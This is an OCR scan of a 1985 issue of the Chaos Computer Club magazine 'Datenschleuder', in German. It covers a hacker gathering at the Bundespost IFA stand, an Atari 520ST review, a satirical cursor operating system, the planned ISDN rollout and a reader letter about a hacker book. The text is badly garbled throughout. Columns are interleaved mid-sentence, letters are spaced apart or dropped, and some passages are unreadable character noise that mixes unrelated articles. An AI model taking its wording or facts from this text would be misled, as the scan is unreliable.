besuchte e i n Teil d e s C C C s o w i e b a y r i s c h e K G S l e r auf d e r I n t e r n a t i o n a l e n F u r u n k e l a u s s t e l l u n g '85 d e n P o s t s t a n d u n e l u d a l l e F r e u n d e z u e i n e r Hackerparly. Die M e i d u n g m a c h t e s c h n e l l d i e R u n d e , d a b e i w a r d i e Papier V e r t e i l u n g e f f e k t i v e r als d i e BtxA n k n d i g u n g . Es f a n d e n s i c h gut 100 L e u t e ein, die alte i r g e n d w a s h r e n und sehen wollten! Hamurger, B a / e r n und Berliner bemhten sich gemeinsam Die vier Seiten der IFASonderausgabe w u r d e eifrig verteilt, sie liegen fr a l l d i e j e n i g e n , d i e k e i n e C h a n c e hatten, i n B e r l i n zu r e c h t e n Zeit a m r e c h t e n Ort z u sein, d i e s e r ds b e i . Wir b r a c h t e n w i e a n g e k n d i g t F a b r a u s e mit, nicht e t w a u m d i e M u l e r z u v e r k l e b e n , s o n d e r n um die Stimmung gleich von Anfang an zu h e b e n , und u m d e n S c h w a r z c n S c h l i n g e l d a m i t zu bewirten, doch dazu sollte es nicht k o m m e n W i e v o n d e r Post g e p l a n t b e g a n n b e s a g t e r k u r z n a c h 15 U h r mit d e m V e r t e i l e n v o n P r e i s e n eines Wettbewerbes. Nacndem er die Bhne b e t r e t e n hatte, w u r d e er e t w a e i n e M i n u t e l a n g v o m P u b l i k u m w e l c h e s nicht a l l z u g r o w a r , a u s g e p f i f f e n u n d g e b u h t . W a s i h n a b e r nicht weiter z u s t o c e n s c h i e n a l s s e l b s t e r n a n n t e r " B u h m a n n d e r N a t i o n " . G e g e n 16 Uhr b e g a b er s i c h v o n d e r B u h n e auf e i n e E m p o r e z w e c k s des besseren Uberblicks ber die e m t r u o e l n d e n " U s e r mit a t y p i s c h e m B e n u t z e r v e r h a l t e n " u n d das f i n g an. w a s erst k n a p p z w e i S t u n d e n s p t e r e n d e n sollte. I m F r e i e n w a r es, w i e i m d s - E x t r a b l a t t a n g e k n digt. g r a u und z u d e m feucht. F r e u n d l i c h e r w e i s e stellte u n s d i e P o s t s t a n d l e i t u n g d e n P e r s o n a l a u f e n t h a l t s r a u m zur K o m m u n i k a l i o n zur V e r f g u n g Hierfr sei n o c h m a l s g e d a n k t , w i r h a b e n u n s w o h l gefhlt W e g e n d e r E n g e war trotz stickiger Luft ein " m O h n m a c h t f a l l e n " u n m g lich. S c h o n das D u r c h r e i c h e n von P a p p b e c h e r n ward z u m Problem. Das g a n z e w a r e t w a s o w i e e i n F a m i h e n t r e t f e n , s o e n g , s o laul. so frhlich. M a n traf Leute, d i e m a n sonst nur v i a Chat oder m a i l k a n n t e u n d k n p f t e n e u e K o n t a k t e z u Leuten, d i e m a n n o c h nicht k a n n t e und es w a r G e l e g e n h e i t , e i n i g e f a l s c h e B e r h r u n g s n g s t e zur Post a b 2 u b a u e n . Es e n d e t e d a m i t , d a m a n s i c h d i e L a s e r s h o w d e r D B P a n s a h , w a s m a n s i c h htte s c h e n k e n knnen Die Grafiken w a r e n zwar teilweise ganz b r a u c h b a r . Ein G r u n d p r o b l e m der Post. Die Technik klappt, aber d i e K o m b i n a t i o n von Formen, F a r b e n u n d M u s i k w a r k n s t l e r i s c h w e r t los Fazit: Ein g e l u n g e n e r N a c h m i t t a g , a u c h w e n n d i e E r w a r t u n g e i n i g e r Gste, d i e auf e i n e n V o r t r a g hofften, e n t t u s c h t w u r d e . S t a t t d e s s e n g a b es e i n e u n b e r s c h a u b a r e M e n ge k l e i n e r G e s p r c h s g r u p p e n , w a s aber v o l l und g a n z d u r c h d i e v i e l e n n e u e n Kontakte aufgewogen wurde. LS 111 p o s t a n 13.ws 850929 2303

Poststandbesuch Wie i n d e r V e r l a g s b e i l a g e angekndigt,

everything you do is right


520 DatensalTOS
Experimente mit einem zuknftigen Computer

ist fast alles. LS 111 trans.13 8:0929 0dti>

aus: C o E v p u l t i o n Q u a r t e r l y 30/1981

Inflation

Die Welt D-e Samstagausgabe der Well ist unmer besonders lustig Zwar heit der Wirtschaftsteii jetzt nicht mehr Welt der Wirtschaft und Fernsehen sondern nur noch Welt der Wirtschaft". aber unter "Geistige Welt" lindet sich Als der Dudelsack noch als Angriffswafte galt Auf der "Wissenschaft "-Seile em Betrag ' Horchgerat fr faule Fruchie- Mikrofone registrieren Freflgerausche von Insekten Ais Aufmdcher auf det Wissenschaftsseite ie muntere Frage nach Pakontrolle am Krankenbett' . Die Unterzene beginnt mit Mediziner fordern. . D-e Sete zwe> b'oekt die Entwck'ung ur Gechberechtigung mit einem neues Scnimpfwort frs Lesevoik Oie Qoctenfrauen kommen' Und Geiier dessen Rucktnt: den Frauenanteil .n der Regierung um 100o erhhte, ergre.fi unter ' Wcitnachrrchien' Partei fr die nicht gleichberechtigten Ehemnner 'Die Tamilie >st fr uns der wichtigste Ori der Gleichberechtigung' und fordert "Euiehunosgeni fr Vater". Eine Untersuchung im Kindergarten zeigte oai) Durchsetzungsvermogen dann Desieht, anderen bei unwichtigen Dingen nach dem Mau' zu reden und bei wichtigen nur Eigen mleressen zu vertreten Geiler hat zumindest das begr.den. Auf der 24 findet sich em "Kiemes Welttheater" und nicht die Witzseite. Autmactier: Unser winziger Postnvmster mit Riesenkopf S'tzt im Fischkutter und fangt femsehgeile Fische im Kabelnetz. 0>e Netzoffnung ist bildschirmfrmig. CSS dreht an der KaCelnetztrommet. Wie in einigen anderen Samstagzeitungen auer der taz findet sich eine Anzeige fr EPSON-Drucker Es wurde noch hingenommer, wenn sie einen ' Volksdrucker liefern wurden Aher sie denken eher an Rolls Royce den s>e groer abbilden als ihre kleinen Drucker. Daneben ein Mietangebot: 50 DM/Woche fr enen LO 1500. Das ist kern anderes Holz-ReisemotM. sondern ein Drucker. "3* einen Tag im Rolls Royce mit Chauffeur Zugewi nen" links daneben die n Verheiung. Selber fanren verboten. Der RR hat das Kennzeichen D-FX 105 und ist von AUTO-Becker Inder 'AUTO-WELT reklamiert etirche Seiten weiter unter dem Artikel "Freier Himmel automatisch" Auto-Secker. das interessanteste' Autohaus der "Weil". Neben einem vom vielen Nachdrucken matten RR-Logo flibts em zehn Jahre gereiftes Modelt IHilomeietslanti genau $8256 km) fr genau )59950 DM. Afs Entschdigung in der "Geistigen Welt' Peter G'aser Guten rag ich bin Lucy'. Eme Erzhlung, von der zu notlen ist. da sie wenigstens em paar Welt-Schreiber begreifen. Peter beschreibt, was passiert, wenn d>e Weit, die er als Autor schafft, ihn zuhause besucht we'fdsI3 ws 850929

Keine Frage, der 520er ist die nchst Hackcnnaachlne. Von den Wenns und Abers hier ein erster Bericht. Gesetz und ist der Proiektname tur ein Network Rechenzeit zur FUSED-PAL-Analyse braucht. Seit kurzer Zeit wird in Hamburg der dort erste 520ST Oriented Minimal Operation System . das in ein 520er Der TV-Modulator wurde eingespart. Zu Recht, denn in einem groen Kaulhaus von fachunkundigem PerEitension-Rom kommen soll. Ins Rom kommt auch die wenn schon ein C64 mit Fernseher ein flaues Bild gibt, sonal bewacht. Fttern verboten. User- bzw. Geratekennung nach Amateurfunknorm kann man 640*400 Pixel auf Bitligmonitoren vergessen. Freunde, die bereits einen haben, berichten, da das Nicht-Amateure und Gerte kriegen nicht zugeteilte Angenehm ist die Maus Das ist eine Art Steuerpult mitgelieferte Kermit eine ie>cht "negative VersionsRu'zoieheri, damit das System aufwrts kompatibel ist. fr eine Hand. Man legt die Hand drau' und kann auf nummer" hatte Und das Betriebssystem ist das ROM Em Implementation des AX-25-Protokolis (Datexdem Tisch rumrollen und gelegentlich auf ein oder noch mchi wert, in das es gebrannt werden mte und ahnlich) ber die MIDI-Ports soll 520er untereinander zwei Knopfchen drcken. Attraktiv und praktisch Softwird aul Floppy geliefert Ein ROM-Update ist lr vernetzen, aber es soll auch ufcer die V?4 gehen. Das ware zum Erstellen von Leiterplanen wre bei 640*4CO irgendwann und 150 UM angekndigt wird ncch dauern Unsere Zielvo'Stellung Umbau des Pnktchen (guter Bildschirm) erwnscht, wird aber Trolzdem interessierte mich der 520er so, da ich ein 5tOer zur Telefonmaschine (Anrufbeantworter mit noch aut sich warten lassen. baden-wrttembergisches Kieinstadtchen besuchte: Sprachspeicherung auf Harclriitk Synthi. MailboxumDie Bauart der Maus (aufschraubhar) ist einfach und Dort konnte ich bei einer Art Computer-auf-demSchaltung mit automatische' Normumschaltung je gut. Eine schwere Kugel rollt leicht ber den Tisch Bauernhof-Shop einen gleich mitnehmen. naen Datentrger und automatische Umschaitung auf und treibt zwei Lichtmhlen mit je 20 Flgeln (Vorsicht Er sei komplett getestet" versicherte man uns, bevor Fernkooierersende-und -empfangsbetneb - alles m bei der Demontage - nichts abbrechen!!'). Dia Flgel einem Gert) und das alles als Multiusersystem mit wir mit drei Kartons nach unerquicklichen Preisverunterbrechen die je zwei LED-Strahlen je nach Bewegvernetzten Ataris oder anderen flechnern, die das handlungen verschwanden ungsrichtung. A<25-Protokoll fressen atacha13 ws 850930 0123 Nach dem Auspacken ergaben sich Berge von Kabeln Auf der Ltseite der Platine sind Minibauelemente und diverse graue und schwarze Kstchen. aufgeschwemmt; das grie ist ein I4pin tC, platt und Die Tastatur erweckt einen guten Eindruck. Die zehn rastermaflig gegenber der bisherigen Normalform schrgen Funktionstasten sehen schick ajs. Aber halt um den Faktor 2.54 geschrumpft. mal beide Hnde nebeneinander vor dich in die Luft, Leider blieb auch hier Atari ein Kabelkramer Ideal acht Finger parallel die um 45 Grad abgewinkelten wre die Infrarotmaus, die selbstndig 2um Batterie Daumen berhren sich und bilden mit den Zeigefingern autladen fahrt, wenn sie nicht gebraucht wird em groes W Du kannst dieses W kursiv stellen, indem Ok mag man auf den Luxus noch verzichten, so ist Du den Winkel links fr F1-F5 verminderst (geht bedie Spar-Dokumentation eine Unverschmtheit Quem) und rechts tut die entsprechende WinkelerhDa die wenigen Quadratmeter englisch gelielert werhung in der Handwurzel weh Das ist die fr Tasten den. mag noch angehen Jedes BiMigtelefon mit einer Der BASTARD-BliU F6-10 erforderliche Handhaltung. "DRUCKEN IN HONGKONG'-Anleitung ist besser do'Unabhngige Clubzeitschritt Oes Bundes ei * Mitten im Kabelwerk standen zwei schwarze Ksten. wendet" fienili sich em neues Biattcnen Cas es kumentiert als der 520er, auch wenn dort "freigestellte Es waren elektrische Kleinkraftwerke Typ "sofort wegS20e'gab Achja. Iirm*nrpulral ' art n.fhl v Q s e< i Smgweisengriffer' auftauchen oder - beim TandytCO werten. wenn Net2kabel kaoutt Atari formuliert ge- 'the digits are rounded mit "Oie Ziffern werden n Dala flliger "Die Netzleitung dieses Gerles kann nicht umrandet" bersetzt wird ersetzt werden Bei Beschdigung der Leitung Gerat ni umscridg u d die Koc'ei n Das Auspacken und die erste Inbetriebnahme ist aul nicht weiter verwenden Mjim'ucfce g m c e aM ein paar Seiten KunsldrucVpapier halbwegs verstandDiese schwarzen Kster waren einfach "zu" und boten Aiel u d W ig n S n n ot a g e lich beschrieben dem Neugierigen kaum Einblick wegen des Siche. - - ireot ertoroen ;anicnde g'auDann gibts noch 72 Seiten LOGO-Kram. im Anhang ist A1 e i rungskonzepts Kleben statt Schrauben". Da ist man tge Vereirismilgtieder Alie B 5 A Mitglieder erhalten O wenigstens der Zeichensalz beschrieben. Auf Fragen M im imrvessum Ws die Mitglieda angeschimert nach Escape-Steuersequenzen oder der Ansteuerung Em Kleinkraftwerk hngt an Tastatur mit Rechner W r u g Sh n eb n c o : entspric der Mausschnittstelle gibts keine Auskunft. Ikabellose Handhabung wie in den Anzeigen prima Sil Or (ileiseite eine M r w r eKon.posnion die tvar fotogen e ao a Stattdessen gibts Firmenpolitik. Fr etwa 1500 DM Mit der Tastatur auf dem Scno geht das Monitorkabel iSI. atier kein tunMionierenei Arbeitsplatz bekommt man ein paar tausend Seiten Doku und leicht raus und die Kiste resettet) ein Kleinkraftwerk De aDgeoruckten Texte k n e eine G a c i enn nc einige Floppies Kurz. Nach Erwerb der Hardware U t r d| Mailbox Se t geserneen De MaiiDo* s n natrlich ne tn i o an der Floppy. Nur der Bildschirm bekam kein schwargibts fr den Pieis eines halben Rechners die zum a e e S lauten A d m <onreol arbeiten wir noch. Cafu O mm T n e zes Kleinkraftwerk mit Warn-Autschrift Das Netzkabel Betreiben notwendige Doku und Software. verraten wir noch nichts E wirrt a e etwas anders a s e e s br us h n ist auch besser und vermutlich auswechselbar. Trotzdem lt die Systemdoku vieles offen. Es mag ja asl das de' Bisher blichen M ito>en laflreuch uOerraschen1 a Die minimale Systemaufienverkabeiung betrgt rund angehen, da das tckische Operatmg System (TOS) Afht S ien weiter Wr k n in Ua.iboi nreibenT e e an 10 Meter, ist aber halbwegs narrensicher Nur bei Jer S schneit e mglich wollen w die M > o m Betrat) o w i ab> i noch nicht ganz lunMioniert. aber leider wird nicht Floppy gibt es ein Problem Am Rechner eine Buchse recht deutlich, wie es eigentlich lunktionieren soll E e < C geschriebene M 1 c aut d m Atan .are schon e e m i a 5 ? m im DIN-Halbschwergewicht mit der Aufschrift 'Floppy wenn es fertig ist. Vermutlich ist das noch unklar lene S c e Sicher fat sic'i e solches Po r m rijch an m r ga m Disc ' an der Floppy zwei Die eine heit IN " und die Das Ding lauft toll, nur sind die HardwaretestprogramkcmiTieriiei verwerten Also w r co'ert <c? e >n i me nicht rechtzeitig fertig geworden Am besten, wir andere OUT" Das ist das Klassische BedienungsanS o flarfrran d s a e nicht lormuiieren Os "at euch P p oo a br a aa 1 User schreiben unsere eigenen 1 Die Lieferbedingunleitungsdilemma Man kann auch einen KioplichtschalCiacker wohl n c mchi Deigeoracnt A> r weiter oei Or oh te e gen vom "Hndler-Informationstag 20 M a i ' 8 5 ' schreitei oben mit OBEN und unten mit UNTEN beschriften Maiibox-Soft F r den Arilang reicht abe' auch p Po r m m r ga m ben in "Anlage 5": fr den C t oder den Schneider C C & P Das Verbindungskabel zur Floppy ist produktionstechUnter solchen Umslanfleri wunae'i ei nicht. w r n Accounts e> nisch aus dem Kernspeicher-Zeilalter Damals wurden " Als Auslallobergrenze lr (einen Sonderrabatt von die lu' D t B c e gedacht Sn nicm m l vo eren Mitar aa e k r id a durch winzige magnetische Kerne je drei haardnne O ie sondern ausschliefxh v n Maoem genutzt weiden et m o 2'o. ds-Red.) . . werden 27/ vereinbart, danach Drahte von Hand gefdelt Heute mssen wohl bei tauscht ATARI defekte Gerate aus Verstndlich ausB-i d r Beschreitung oes rioppy 0'S* Anschusses k m t eine e om Atari Floppykabel von Hand gelotet werden. Vielleicht aktuelle Bescnreiung z m "lud Pui Mieruber lau'en oie u gedruckt ATARI behalt es sich vor an Handler bis zu ist das ein Grund tur die lieterverzogerungen. initiaisieri,nqspuise der lautwerkseienranik im aktiven Z u 27'0 Schrott ohne Rcknahme oder Entschdigung zu Die angeblich "UnaChangige Club2eitschrift BASTA stand fuhrt dieser Pegel T L P g i u < s o A Tiv L W ir.iem T ee nj m < O liefern urvi gewhn oa'ur 2 % e*trarabatt wr.u ei durch iren 1 Horm PulvtWide'Stand nach S V BLITZ von ertanrenen DATA BECKER fachauioren Das haut jeden um oder ergibt wie Atari formuliert, h c q legt oh e beschuldigt die Post sie sei schuld an den Liefervereme hohe Umschlaggeschwindigkeit D s ist-vnf aber k m W n c a e ue a.e vor Beschl. zogerungen wegen der FTZ-Nummer.. Hier mu die Zur "Untersttzung des Abverkaufs" bietet Atari einen 2e o tiung rr I 5 0 r n c Post in Schulz genommen werden denn irotz erteilter Materndienst (Papptatein mii negativer Prgung eines i Signa Nummer gibts nicht gengend 520er im Handel. Schriftsatzes, der Duden) und "Nationale Werbung'' Das Zerlegen von Tastatur und Rechner war FummelUnter Atari-Prsentation findet sich der Punkt Verkram. da alles blechmaig abgeschirmt, verschraubt, strkung des Images': darunter ein LKW-Oidie mit Atari-Werbung Mehr spater, nicht heute verklemmt und verlotet war Auch hier hat Atari noch nicht das rechte Produktionsknowhow: Snap-InGehuse sind besser und billiger, setzen aber gutes Oesign una entsprechende Testverfanren voraus. Wie bei Behrden: Alles Auslegungssache ai13w5 6 0 0 030 1=0 Oer Videoteil (32 0424 MHz) im Rechner ist abgeOas mitgelieferte Logo ist vom efehlsumfang drftig schirmt wie em HF-Teil im Fernseher Auf der Unterund reagiert auf 5 roch2 mit 24.999 Null hoch n seite tief Platine (Rev. B) ein Sonder-R (gb-vi-sw-gdgeht nicht uswusf. ala520i3 ws 850929 1937 sw> oben ein nachtraglicher R (Null Ohm), kein CutSJumper Vier ROM-Sockel zu je 32 KB sind noch frei, Chaos-Plne mit dem 520er zwei sind mit 64 KB Bootsuh gefllt Das ist der wahre Grund warum die 128KB-Version nicht auf den Markt Der CCC-CH wuselt an einer Mailbox in C rum Die kam Das RAM wre schon mit dem Betriebssystem Bayern fluchen bers nicht laufende Kermit. Die Berberfllt gewesen. Denn Floppy TOS umfat mehr als liner machen irgendwas uns unklares. Oie Hannove200 KB und die passen nicht m 128 KB Was in TOS raner wollten noch Floppies vorbeischicken Es gibt drin ist. bleibl unklar. Erste Untersuchungen erwecken Beschaffungsprobleme: Wer hat eine Bezugsquelle lr dn Arschein. Jack sei leibhaftig in digitalisierter Form die Fioppy-Gigadmstecker? Danri lassen sich fr 500 drin Er mu noch ausgetrieben werden: OS statt TOS. OM doppelseitige Vobislloppies anschlieen In HamOie 16 Speicher-ICs (je 256KBit) sind grozgig auf burg gab es Floppy-Tests Man kann die Original der Platine verteilt und bielen Platz fr ein berschauTOS-Floppy in einen Aricot reinstecken. Zwar lt sie bares Redesign Gesockelt sind nur die flOMs. der sich nicht direkt p o g i s c h " ) lesen, aber "physikalisch 6690t und der DMA-Harddiskkontroller sowie die das Aufzeichnungsformal wird geschluckt und die beiden Cusfom-ICs in imnvArenasockeln. Sie sind der Directory-Eintrge sind zu finden. Dabei ergab sich, gegenwrtige Kopierschutz. Software, auch ROMs. da (u.a.) KERMIT vorher drauf war .und dann als fassen sich ganz (eicht kbpieren. Hardware auch das gelscht markiert wurde. Jedes an mich ausgelieferte zeigen die Apple- und ISM-Nachbauten. PALs erforBit gefrrt mir. oder??? Oern etwas mehr Mhe, aber d i e lassen sich per Soitwire analysieren Dabei Ist-aueh egal ob das Weitere Plne werden gerne verraten, da sie a m

ls' doch LOGO!

. i) daterischleuder_13 * i

runMrWtvtabM* PrbOfBnm

Wnch

hln7gemeinsam verwirklichtt O W U ardan, L i - i ^ A n ir* aul

$aten3djtcubcr
Was sind Ihre mickrigen 64 Kilobytes Speicherplatz gegen die Millionen a. von Bumen in unserem Urwald oder die Milliarden von Grashalmen * / auf unseren Savannen/ " Catastrophe Theory

*\tl

Die Seele eines neuen Cursor


Quelle: Originaltext 29. 07. 65 (c) P.GLASER Erstverffentlichung COMBOX:FEUi leton

Das Cursor Operation System COSY

Nr. 13/85

Die Entstehungsgeschichte von COSY (Cursor Operation System) Ein amsantes, aber fachlich unkorrigiertes Bach stammt vom Heyne-Verlag. Richtig geklappt hat merkwrdigerweise die Datenbertragung eines Mailboxverzeichnisses im Anhang ausgerechnet von der Telebox. Und so findet sich unler 'Mailboxen in Deutschland" unter dem Eintrag Chaos Computer Club eine private Telefonnummer mit dem korrekten Vermerk "Keine Mailbox!". Jetztr ist sie nicht mehr privat und Nummer der Btx-Redaktion (Notlsung) Hatten andere Leute hnliche Probleme? Beim Lesen finden sich ein paar wit2ige Personenbeschreibungen, die in einigen Punkten etwas verwischt sind. Dazu kommt eine Sammlung vieler Hackerstohes. Lastig ist der Personenkult. Em Datenschleuder-Leser schreibt dazu nach einem Vorspann zum Bezugsproblem datenschleuder: DM (Leider drfen wir hier den richtigen Preis nichl schreiben, da das sonst Werbung wre. Red ds) gekauft. Und drin handelt das Ding last nur von Wauibaby. Ist es etwa das? Verschlingt die Pflege des Personenkults alle Zeit und alles Geld? Die beiden Autoren vergaen zu erwhnen, was rtian zum Frhstck essen mu. damit man ein weltberhmter Hacker wird (Falsch. Auf Seite 10 steht "...Butter lila frben kann." Die Autoren besuchten Wau. als er Brtchen mit lila Butter und Honig frhstckte. Red. ds) Nun gut. Will ich mich langsam wieder abregen. Was wir aber nicht bersehen wollen ist. da ich seit der Einladung zum Congress keine ds mehr bekommen habe. ber den Congress habe ich tatschlich erst wieder was in diesem bescheuerien Buch gelesen. Ich wre euch dankbar, wenn ihr meinen Briefkasten, bzw. den Brietkasten meiner Freundin, demnchst reichlich mit guter Literatur fllen wurdet. (Wir mhen uns redlich. Anm. ds) Schickt mir ja nicht dieses besemmelte Buch, das ich leider schon habe? (Versuch es bei Heyne mit einem Garantie-Umtausch. Anm. ds) Gru. Frank (War nett, wenn Cu die Hackerbibel rezensierst. Deine Art gefllt. Besuch uns mal. Anm. ds)

Teii /

Heyne Halbschnellschu

Ich weiss nicht - Ich denke, mit der Zeit soll mir der auch lieber werden.
(Goethe. Die Leiche des jungen Khoerser) Angefangen hatte alles im Frhjahr 1985 mit dem stilvollen Hinscheiden einer Grossrechenanlage: CURSOR LOST waren ihre letzten Worte gewesen, bevor sie i n den hexade2i mal en Hades hinabgefahren war. Diese schlichten Abschiedsworte inspirierten einen Kreis junger Menschen: Sie hatten sich zu einem "Autonomen Sink Tank" (AST) zusammengeschlossen. Man war lange schon mit der phantasielosen Funktion und dem Erscheinungsbild des landlufigen Cursor Vulgaris unzufrieden gewesen: Ein langweiliger Lichtfleck, der. wenn er nicht grade blde blinkte, nichts weiter als trostlos anzusehen war. Nun gab es, einen Innovalionsschub: Das Projekt VIC, der "Virulent Intensiv Cursor", wurde geboren. Noch in der selben Woche begann der AST mit der Konzeption eines umfangreichen und multifunktionalen "Cursor Operation Systems" (COSY). Optimal anwenderfreundlich, war es als "Gnzlich Userlos Arbeitende Schalteinheit' (GULASCH) angelegt. Online sollte es sich als "Wundersam Aktives Untergrundprogramm" (WAU) rege verbreiten. Pionierstimmung kam auf im AST-Labor. Fr die Konstruktion mute geeignetes Software-Werkzeug her: "Cursor Art Design" (CAD). "Cursor Action Modificator" (CAM) und "Funny Unusuaf Cursor Kit" (FUCK) wurden in nachte- und wochenlanger Arbeit entwickelt. Dazu bediente der AST sich eines eigens fr diesen ZweckspezifiziertenCodes.des "Cursor Oriented Language Assembler" (COLA) mit eingedickter Fliesskomma-Konsistenz und einer an Andy Warhol orientierten GrafikBefehlsleiste. Ende Mrz, in der zunehmenden Frhsommerwrme. wurde der erste Satz CURSOR ERRORS erstellt und plaziert. Fortran konnten, ber das CURSOR LOST hinaus, angezeigt werden:

(nur bei ben2in- und dieselgetriebenem Cursor). Sollte kein Tank-File vorhanden sein, kann man das Zeichen " " vor den Cursor set2en und ihn damit anschieben.

CURSOR OUT OF GAS

bleibt der Cursor daran kleben. Er lsst sich weiterhin frei bewegen, zieht aber, ausgehend von der Position des Buchstaben, inverse Streifen hinter sich her. Lsst man die Cursorlasten los. schnellt das Cursor&and wieder aul die Buchstaben marke Zurck.

9 inteilsatsystems. mit insgesamt 153000 Telefon-und 24 Fernsehkanlen. Durch Satelliten knnen jeweils 12000 Telefongesprche gleichzeitig bertragen werden Global gibt es ber: 550 mio. Telefonanschlsse. 1.5 mio. Fernschreiber. 6 mio. Terminals und rund 1 mio. kommunikationsfhige PC's Mehr als 24 mio. Fernsprechhauptanschlsse entfallen allein aul das Fernsprechnetz der DBP. Die Telekommunikationsdienste der DBP bestehen heute aus getrennten Fernmeldenetzen. wie das herkmmliche Fernsprechnetz mit ca. 30 mio. Telefonen, das Integrierte Text- und Datennetz in digitaler Technik |IDN) swie die lokalen Breitbandverteilnetze fr die bertragung von Ton-und Fernsehprogrammen. Als vor 7 Jahren die Grundsatzentscheidung der DBP fiel, ihr total veraltetes Fernmeldenetz zu digitalisieren, und die einzelnen Netze zu integrieren, war das herkmmliche Fernsprechnetz Mittelpunkt ihrer berlegungen, Denn es bringt die wichtigsten Voraussetzungen einer Netzintegration von vornherein mit: es ist das ffchenmssig am dichtesten ausgebaute Netz, es hat bei weitem die grosste Teilnehmerzahl, es dient der geschftlichen wie der privaten Kommunikation, seine technischen Einrichtungen sind vergleichsweise preiswert, es ist weitgehend international standardisiert. Die Grenzen des Fernsprechnetzes liegen jedoch in seiner eingeschrnkten bertragungskapazitt und -qualitit. Die Teitnehmeranschlsse des Fersprechnetzes und des Integrierten Text und Datennetzes bestehen ausschliesslich aus Kupferkabel, dessen niederes Leistungsniveau nicht die Ansprche von Morgen gewhrleisten. Seit 1982 ist die OBP nun dabei, die bertragungssysteme des regionalen Fernverkehrs zu digitalisieren. Nach Angaben der DBP wird der Oigiialisierungsgrad 1985 einen Wert von 20% der gestalteten Leitungen nicht uberschreiten. Die Digitalisierung der Ubertragungssysteme der berregionalen Verbindungen werden aller Voraussicht 1990 die 50% Klausel erraffen, erst 10 Jahre spter im Jahr 2000 hofft man, die 100% Digilalisierung hinter sich zu bringen. Der vollstndige Ausbau des Fernsprechnetzes in digitaler Technik wird voraussichtlich im Jahre 2020 abgeschlossen werden. Da schon im Normalfall bei rter DBP alles lnger dauert, wird im Ernstfall ein Digitalisierungsende nicht vor dem Jahre 2050 zu erwarten sein, was sehr starken Zweifel an dem ganzen Projekt aufkommen lsst. Die Grnde liegen laut DBP in den enormen Innovations- und investltipnsansprchen dieses Projektes, denn allein das Auswechseln der rund 6700 Vermifffungssieffen des Fernsprechnetzes mrt den Mitfionen von Leitungen erfordert Jahrzehnte und Investilionen in Milliardenhhe. Die Vermittlungsstellen besitzen fr sich allein einen Wiederbeschaffungswert von ca. 40 Mrd. DM-West. Nach Fertigstellung dieses neuen Fernmeldeneues trgt es den stolzen Namen: ISDN". Was fr den international standardisierten Begriff: Integrated Services Digital Network steht. Ziel dieses Schaffens stellt der ISON-Saaisanschluss dar. bei dem ber die herkmmliche Kupferdoppelader der Teilnehmeranschlussleitung in digitaler Form zwei Nutzkanle mit je einer Bitrate von &4 kbit/s sowie ein zustzlicher Steuerkanal mit 16 kbit/s bermittelt werden knnen. Besonderes Merkmal des ISDN ist. die seit langem erwartete, genormte Teilnehmerschnmstelle. bezeichnet als " Die Universalsteckdose "... Was bietet uns. dann Verstorbenen, das ISDN-Projekt? Im ISDN-Fernsprechen wird eine bessere Sprach bertragung gegenber dem heutigen Fernsprechen garantiert. Beim ISDN-Teletex knnen ber 64 kbit/s eine OIN-A4-Seite in weniger als 1 Sekunde statt bisher 8 Sekunden bertragen werden. Wenn im Jahre 20?? BTX noch vorhanden sein sollte, sind die Benutzer in der Lage ber ISDN-Bildschirmpest schnellere Bildaufbauzeiten zu genieen. Laut DBP wird es jedoch an dem unberwindbaren Anpassungsaufwand in den Bildschirmtextvermittlungsstellen scheitern. Die ISDN-Bildbermittlung erwirkt etwa alle 4 Sekunden ein neues Standbild. Bewegtbilder sind im ISDN natrlich nicht mglich. Aber was kmmert uns. dann in den ewigen Jagdgrnden der Datenwelt, verstorbenen Hackern und Datentouristen der ganze ISDN-Alptraum? Was bleibt ist jedenfalls nur die neue Date*-L Verbindung in die USA. d<e der Gilb in Zusammenarbeit mit der amerikanischen Fernmeidegeseiischaft TRT Telecommunications Corporation und der Firma Nixdorf Computer AG errichtete. Die 2400 Dit/s Datex-L Verbindung wurde auf der Hannover-Messe 1985 erffnet created by Ooefix. Das Redaktionsteam erhielt zum Redaktionsschlu diesen Beitrag Er ist die berarbeitung eines lteren Entwurfs fr die ds 11/12, der aber nichi abgedruckt wurde. Wir bitten um Zuschriften, die wir an den Autoren Weiterleiten et isdnob13.ws 850929 2200

Post Future?

Ein heikles Problem: Der Cursor ist in eine Sinnkrise verfallen und hockt dumpf brtend in Spalte 0 einer beliebigen Zeile a m Biidschim> rand.

CURSOR OUT OF SENSE

CURSOR COLLAPS (N)


wobei (N) eine Countdown-Variable ist, die den geschtzten Zeitpunkt bis zur Disfunklion des Cursors in sec. anzeigt. Inzwischen hatte auch die Erweiterung der Grafikroutinen grosse Fortschritte gemachL Je nach Art des Anwenderprogramms und des User-Input-Verhaltens vermochte der Cursor nun selbststndig in Modiiikationen zu verzweigen (von denen einige zur Dominanz ber das gesamte aktuelle Programm fhren). Endlich konnte der Cursor zeigen, was in ihm steckt. Die AST-Grafikspezialisten natten 6 zentrale Routinen erarbeitet, die am 7.Juni zusammen mit den neqen Fehlermeldungen als Version COSY 0.1 den ersten erfolgreichen Probelauf absolvierte. Zur Feier des Tages genehmigte man sich eine Flasche Frustschutzmittel und rauchte dafr etwas weniger.

Eine Spezialroutine fr das freie Programmieren, Sind dem Programmierer gerade einige besonders geschickte Algorilhmen eingefallen, kann COSY via COZ von Fall zu Fall PACUR aktivieren. Eingeleitet wird die Funktion durch die Meldung SYNTAX TERROR. Anschliessend werden mit einer Geschwindigkeit von einer Zeile pro Sekunde die letzten 200 Programmzeilen wieder weggefressen. Ist die Hardware mit einem Tongenerator ausgestattet, erkennt man den Abschluss einer PACUR-Aktion an einem leisen Rlpsen.

PACUR (Pacman Cursor)

"Wenn es ein Phnomen wie das absolut Bose berhaupt gibt, dann besteht es darin, einen Menschen wie ein Ding zu behandeln." (John Brunner) Und doch tun sie es. diese Perfeklionisten. diese entsetzlich tchtigen Leute, die mit ihren przise funktionierenden Fischgehirnen Menschen auf Stckgut, auf Menschenmateriat. auf Zahlenkombinationen reduzieren, um sie in den Gritf zu bekommen, um sie als numerische Gren in ihren Kalklen handhaben zu knnen Wie winzig der Schritt von diesem Denken zum Handeln ist. ist Alltag. Beispiel: Fr einen Atomstaat ist es Kleinkram, ein Schiff von Greenpeace zu sprengen und dabei einen Fotografen zu ermorden. Das gibt einen Ministerrcktritt, und diejenigen, die die Presse informierten werden bestraft und nicht belohnt. Noch verlgt kein Land der Welt ber den elektronischen Perfektionismus, wie ihn Brunner im "Schockwellenreiter" beschreibt. Aber die Zimmermnner aller Lnder bauen daran und wollen, da wir - angeblich zu unserer Sicherheit - im Datennetz zappeln. Oann 